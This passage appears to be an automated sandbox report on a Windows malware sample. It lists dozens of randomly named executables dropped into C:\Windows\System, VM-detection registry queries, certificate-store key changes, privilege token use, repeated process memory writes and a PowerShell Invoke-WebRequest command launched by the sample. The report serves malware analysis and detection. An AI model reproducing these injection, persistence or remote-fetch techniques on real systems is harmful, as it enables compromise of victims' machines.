File created C:\Windows\System\AuvcwMT.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\gvDPxae.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\UKpxzhk.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\rFltmUM.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\NdPJbOM.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\MmKZRST.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\wPZnwol.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\VbuctJV.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\JQODQFl.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\NXasKgc.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\JLwSimq.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\NsilLSf.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\NFDpuBD.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\vcqSeMI.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\VjMaPun.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\GfmUbNR.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\oONHVIA.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\xpVrUIh.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\kOGDMAy.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\RyJBvVT.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\kDltENi.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\vEdkLpr.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\TgHbiqY.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\VkstmWe.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\oGggGrc.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\jtOpXzn.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\YfAITPb.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\gZOCvSh.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\kgGmPgf.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\xrOWUWC.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\qXpJQAp.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\cPlnKrr.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\BTBBMhI.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\EZJDAzY.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\BNeTCxF.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZCNmnuU.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
File created C:\Windows\System\bpxXkeo.exe C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\dwm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3660 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3660 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3660 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\jKGXQmW.exe
PID 3660 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\jKGXQmW.exe
PID 3660 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\kWTdukO.exe
PID 3660 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\kWTdukO.exe
PID 3660 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\xTKRzCy.exe
PID 3660 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\xTKRzCy.exe
PID 3660 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\fihThal.exe
PID 3660 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\fihThal.exe
PID 3660 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\WOBYsrl.exe
PID 3660 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\WOBYsrl.exe
PID 3660 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\mTCznBo.exe
PID 3660 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\mTCznBo.exe
PID 3660 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\tITsbPu.exe
PID 3660 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\tITsbPu.exe
PID 3660 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\mmekLBA.exe
PID 3660 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\mmekLBA.exe
PID 3660 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\fyrEXZB.exe
PID 3660 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\fyrEXZB.exe
PID 3660 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\cTfcrhB.exe
PID 3660 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\cTfcrhB.exe
PID 3660 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\zjZWkIq.exe
PID 3660 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\zjZWkIq.exe
PID 3660 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\DrPRDZY.exe
PID 3660 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\DrPRDZY.exe
PID 3660 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\jdTrbAD.exe
PID 3660 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\jdTrbAD.exe
PID 3660 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\WOmEnfX.exe
PID 3660 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\WOmEnfX.exe
PID 3660 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\AyvKFyt.exe
PID 3660 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\AyvKFyt.exe
PID 3660 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\wOLVltp.exe
PID 3660 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\wOLVltp.exe
PID 3660 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\yjmkZRh.exe
PID 3660 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\yjmkZRh.exe
PID 3660 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\uPHcopo.exe
PID 3660 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\uPHcopo.exe
PID 3660 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\kDltENi.exe
PID 3660 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\kDltENi.exe
PID 3660 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\AdHalos.exe
PID 3660 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\AdHalos.exe
PID 3660 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\UAfZBHJ.exe
PID 3660 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\UAfZBHJ.exe
PID 3660 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\QrtaWgQ.exe
PID 3660 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\QrtaWgQ.exe
PID 3660 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\sGypFto.exe
PID 3660 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\sGypFto.exe
PID 3660 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\GsITysl.exe
PID 3660 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\GsITysl.exe
PID 3660 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\xGOxUKZ.exe
PID 3660 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\xGOxUKZ.exe
PID 3660 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\LZLMVYI.exe
PID 3660 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\LZLMVYI.exe
PID 3660 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\pZoYbYO.exe
PID 3660 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\pZoYbYO.exe
PID 3660 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\ECVNDFH.exe
PID 3660 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\ECVNDFH.exe
PID 3660 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\ObNNBvP.exe
PID 3660 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\ObNNBvP.exe
PID 3660 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\jknWzoy.exe
PID 3660 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\jknWzoy.exe
PID 3660 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\pQjvVOh.exe
PID 3660 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\pQjvVOh.exe

Processes

C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\jKGXQmW.exe

C:\Windows\System\jKGXQmW.exe

C:\Windows\System\kWTdukO.exe

C:\Windows\System\kWTdukO.exe

C:\Windows\System\xTKRzCy.exe

C:\Windows\System\xTKRzCy.exe

C:\Windows\System\fihThal.exe

C:\Windows\System\fihThal.exe

C:\Windows\System\WOBYsrl.exe

C:\Windows\System\WOBYsrl.exe

C:\Windows\System\mTCznBo.exe

C:\Windows\System\mTCznBo.exe

C:\Windows\System\tITsbPu.exe

C:\Windows\System\tITsbPu.exe

C:\Windows\System\mmekLBA.exe

C:\Windows\System\mmekLBA.exe

C:\Windows\System\fyrEXZB.exe

C:\Windows\System\fyrEXZB.exe

C:\Windows\System\cTfcrhB.exe

C:\Windows\System\cTfcrhB.exe

C:\Windows\System\zjZWkIq.exe

C:\Windows\System\zjZWkIq.exe

C:\Windows\System\DrPRDZY.exe

C:\Windows\System\DrPRDZY.exe

C:\Windows\System\jdTrbAD.exe

C:\Windows\System\jdTrbAD.exe

C:\Windows\System\WOmEnfX.exe

C:\Windows\System\WOmEnfX.exe

C:\Windows\System\AyvKFyt.exe

C:\Windows\System\AyvKFyt.exe

C:\Windows\System\wOLVltp.exe

C:\Windows\System\wOLVltp.exe

C:\Windows\System\yjmkZRh.exe

C:\Windows\System\yjmkZRh.exe

C:\Windows\System\uPHcopo.exe

C:\Windows\System\uPHcopo.exe

C:\Windows\System\kDltENi.exe

C:\Windows\System\kDltENi.exe

C:\Windows\System\AdHalos.exe

C:\Windows\System\AdHalos.exe

C:\Windows\System\UAfZBHJ.exe

C:\Windows\System\UAfZBHJ.exe

C:\Windows\System\QrtaWgQ.exe

C:\Windows\System\QrtaWgQ.exe

C:\Windows\System\sGypFto.exe

C:\Windows\System\sGypFto.exe

C:\Windows\System\GsITysl.exe

C:\Windows\System\GsITysl.exe

C:\Windows\System\xGOxUKZ.exe

C:\Windows\System\xGOxUKZ.exe

C:\Windows\System\LZLMVYI.exe

C:\Windows\System\LZLMVYI.exe

C:\Windows\System\pZoYbYO.exe

C:\Windows\System\pZoYbYO.exe

C:\Windows\System\ECVNDFH.exe

C:\Windows\System\ECVNDFH.exe

C:\Windows\System\ObNNBvP.exe

C:\Windows\System\ObNNBvP.exe

C:\Windows\System\jknWzoy.exe

C:\Windows\System\jknWzoy.exe

C:\Windows\System\pQjvVOh.exe

C:\Windows\System\pQjvVOh.exe

C:\Windows\System\jWMixBW.exe

C:\Windows\System\jWMixBW.exe

C:\Windows\System\RXDScBz.exe

C:\Windows\System\RXDScBz.exe

C:\Windows\System\rDQGGgy.exe

C:\Windows\System\rDQGGgy.exe

C:\Windows\System\kPVHMfK.exe

C:\Windows\System\kPVHMfK.exe

C:\Windows\System\JZCWXgM.exe

C:\Windows\System\JZCWXgM.exe

C:\Windows\System\Gzdxrok.exe

C:\Windows\System\Gzdxrok.exe

C:\Windows\System\Eccluag.exe

C:\Windows\System\Eccluag.exe

C:\Windows\System\hTiTqLg.exe

C:\Windows\System\hTiTqLg.exe

C:\Windows\System\LaVuaSL.exe

C:\Windows\System\LaVuaSL.exe

C:\Windows\System\FWiVsNf.exe

C:\Windows\System\FWiVsNf.exe

C:\Windows\System\QBxInnR.exe

C:\Windows\System\QBxInnR.exe

C:\Windows\System\siQOrOm.exe

C:\Windows\System\siQOrOm.exe

C:\Windows\System\lGMrvqD.exe

C:\Windows\System\lGMrvqD.exe

C:\Windows\System\kiNnmWo.exe

C:\Windows\System\kiNnmWo.exe

C:\Windows\System\SLyuyXH.exe

C:\Windows\System\SLyuyXH.exe

C:\Windows\System\CBusTsG.exe

C:\Windows\System\CBusTsG.exe

C:\Windows\System\fpKRDPJ.exe

C:\Windows\System\fpKRDPJ.exe

C:\Windows\System\DoZFbKu.exe

C:\Windows\System\DoZFbKu.exe

C:\Windows\System\YlgXRVA.exe

C:\Windows\System\YlgXRVA.exe

C:\Windows\System\aKtxQgX.exe

C:\Windows\System\aKtxQgX.exe

C:\Windows\System\CsfwLAY.exe

C:\Windows\System\CsfwLAY.exe

C:\Windows\System\zISihmg.exe

C:\Windows\System\zISihmg.exe

C:\Windows\System\RwRCjrD.exe

C:\Windows\System\RwRCjrD.exe

C:\Windows\System\gDnwfwW.exe

C:\Windows\System\gDnwfwW.exe

C:\Windows\System\JBzfndE.exe

C:\Windows\System\JBzfndE.exe

C:\Windows\System\rFltmUM.exe

C:\Windows\System\rFltmUM.exe

C:\Windows\System\UxaOhqM.exe

C:\Windows\System\UxaOhqM.exe

C:\Windows\System\SvgnFul.exe

C:\Windows\System\SvgnFul.exe

C:\Windows\System\zNgdogn.exe

C:\Windows\System\zNgdogn.exe

C:\Windows\System\BNeTCxF.exe

C:\Windows\System\BNeTCxF.exe

C:\Windows\System\ngltaEG.exe

C:\Windows\System\ngltaEG.exe

C:\Windows\System\aWnQBKh.exe

C:\Windows\System\aWnQBKh.exe

C:\Windows\System\kwayEEK.exe

C:\Windows\System\kwayEEK.exe

C:\Windows\System\JtcCRkL.exe

C:\Windows\System\JtcCRkL.exe

C:\Windows\System\AklchlD.exe

C:\Windows\System\AklchlD.exe

C:\Windows\System\AbwCVdn.exe

C:\Windows\System\AbwCVdn.exe

C:\Windows\System\VjMaPun.exe

C:\Windows\System\VjMaPun.exe

C:\Windows\System\kjXfSts.exe

C:\Windows\System\kjXfSts.exe

C:\Windows\System\tqzAzkc.exe

C:\Windows\System\tqzAzkc.exe

C:\Windows\System\EJhFypp.exe

C:\Windows\System\EJhFypp.exe

C:\Windows\System\eHCWAxe.exe

C:\Windows\System\eHCWAxe.exe

C:\Windows\System\dbPYved.exe

C:\Windows\System\dbPYved.exe

C:\Windows\System\DkPJsjE.exe

C:\Windows\System\DkPJsjE.exe

C:\Windows\System\AUNvEXT.exe

C:\Windows\System\AUNvEXT.exe

C:\Windows\System\JDaoQrU.exe

C:\Windows\System\JDaoQrU.exe

C:\Windows\System\uiiZNYP.exe

C:\Windows\System\uiiZNYP.exe

C:\Windows\System\nJfWgkA.exe

C:\Windows\System\nJfWgkA.exe

C:\Windows\System\ImsWwpk.exe

C:\Windows\System\ImsWwpk.exe

C:\Windows\System\ISGEmrx.exe

C:\Windows\System\ISGEmrx.exe

C:\Windows\System\EjiQAlI.exe

C:\Windows\System\EjiQAlI.exe

C:\Windows\System\sWuNcLM.exe

C:\Windows\System\sWuNcLM.exe

C:\Windows\System\jnuqhJF.exe

C:\Windows\System\jnuqhJF.exe

C:\Windows\System\lpXlvHt.exe

C:\Windows\System\lpXlvHt.exe

C:\Windows\System\fRluHqm.exe

C:\Windows\System\fRluHqm.exe

C:\Windows\System\uHUJYYY.exe

